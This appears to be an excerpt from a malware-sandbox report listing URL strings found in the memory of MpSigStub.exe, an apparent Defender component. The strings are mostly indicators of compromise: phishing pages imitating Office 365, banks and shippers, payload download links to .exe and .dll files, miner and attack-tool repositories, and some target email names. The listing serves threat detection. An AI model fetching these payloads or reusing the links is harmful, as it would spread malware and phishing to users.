Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/68070804
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Alexuiop1337/Trojan-Downloader/raw/master/fee.exe
Source: MpSigStub.exe, 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://giversplusz2020.ddnsking.com/audio/amvlbmeuam9obkbqy3cub3jn
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://gmaax.in/wp-includes/js/crop/reportcmacgm.php
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/6bvmse)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://gposervitech.com/wp-content/cgi-bins/files/office365html/office
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://grandvilaformosa.comNOuxgc/NOuxgcwp-contenNOuxgct/pluginsNOuxgc/woNOuxgcrdpress-seo/css/disN
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://granelseeds.cl/wp-includes/js/ghost/countrysubjectip.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://griginet.com/ggassh/sshrod.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://help-lolooo.cf/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/ajo/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/egab/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/emzf/processor.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/lin/processor.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://holisticxox.com/doc/check.doc
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://holisticxox.com/doc/payment.doc
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://hotel-harmonia.am/images/prettyphoto/login/redirect.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://hrupd00t.rest/kgwdt5pthdawnnewibpybtyht/?i8kka7gioxp=c2f1zglhy2fyz29pddiwmebzyxvkawfjyxjnby5
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://htrzogrzers.com/wed/opo.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://ieaspk.com/instagram.dll
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://ieaspk.com/instagram.dllx
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://immobiliareneri.casa/drms/ind.html
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://institutoimepe.com.br/jl/autooffice2errors
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://inter-pipe.ga/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: https://internetbanking.caixa.gov.br/SIIBC/index
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://invoiceadvantagereminder.ew.r.appspot.com/index.html#ivan.tiutiunnyk
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://iplogger.com
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://iqras.pk/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://iqras.pk/inno/inno/innoc.doc
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://itaubankline.itau.com.br/V1/PERS/IMG/bt_confirmar.gif
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://jbrealestategroups.com/wp-content/themes/bridge/extendvc/msg.
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://jiksh.com/?referrer=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp	String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://jusreihnt.com/dpz/?email=
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: https://kelwinsales.com/ds/1702.gif
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://kiki-lo.online/?e=ckomorowski
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://kinzlerimmigration.com/wp_include/redirect/anvsawuuy2fydgvyqhridmmuy29t
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://kiosp.dyndns.dk/icon4/next.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://kirimliinsaat.com.tr/ui/office365
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://kiwisanagustin.com/wp-admin/includes/opo.php%22%20method%3d%22post%22%20style%3d%22box-sizin
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://kod.haohaoda.cn/plugins/picasa/newpo.png
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://kofiruions.xyz/royal/brand.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://konzmny.com/?qs=a9537c1ce6614636144ad0c9e0975ac106bb986006db8f6a0789e5b0d16dcf4fc15476ba5afa
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://koooking.online/webs/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://kraft.eng.br/
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://kurtoch.eu/rgfyzrxlr/ind.html
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://kweraltd.com/wp-content/plugins
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://l%%8Kvfcrl%%8Kvfyptl%%8Kvfoexpert.work/core/venl%%8Kvfl%%8Kvfdor/doctrine/lexer/lib/cpf9PlDn
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://labrie-sabette.com/wp-includes/sodiu
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://lacoronadela11.com/wp-includes/q/?email=
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://lasvegasmanageditservices.com/oso.php
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://lawyersblog.net/777/picture9.dll
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp	String found in binary or memory: https://legalproceedings.uc.r.appspot.com/legal_proceeding_concerning_overdue_invoices_pdf.jar
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://limarija-das.hr/wp-content/plugins/wp-optimize/js/handlebars/CJrMovjhM.phpMXynE
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: https://linesburline.at/3/bbc.dll
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://linhaansi.com.br/wp-includes/maersk/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/elgja
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://linkr.uk/fyu5r
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://linkzip.me/
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://liquide.co/3qyyerb6gvx/ind.html
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://listoparacomer.com.ve/wp-content/hewlett-packard-mcafee/hpe.html
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://litesound.ml/fax/policy.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://livelongerfeelbetter.com/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/postlog.php
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: https://livesnoop.com/client/screenshots.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://lixns.com/xl/?referrer=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://lmvus.com/omar/90/$8900.doc
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://location.services.mozilla.com/v1/geolocate?key=test
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://login.livevoice365.xyz/
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/
Source: MpSigStub.exe, 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp	String found in binary or memory: https://login.yahoo.com/config/login
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://loginmixcrhustim0fficia6.ga/xi/policy.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://logowrench.website/zdz0ptxdtonla.php
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: https://logs1186.xiti.com/
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: https://logupdate.herokuapp.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/ekdnl
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/htyul
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/mccwd
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/tllwu
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://longurl.in/welhl
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://lupoun.com/moon/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://m3lloyellow.com/rodrich.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://macflypro.com/builds/data/
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://maersoul.com/vix/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://mailsending.site/Happy_CS/happyFun.exe
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://main.bgsr.site/wp-rR:/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://main.iam.ad.ext.azure.com/api/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://malsay.myftp.biz/ck/business/index.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://mamulln.cl/kwi/?email=travis_phillips
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://manorrestaurantstrasburg.com/wp-zincludez/makdire/emonofhgh/wofjgjbledon/gen2021.php
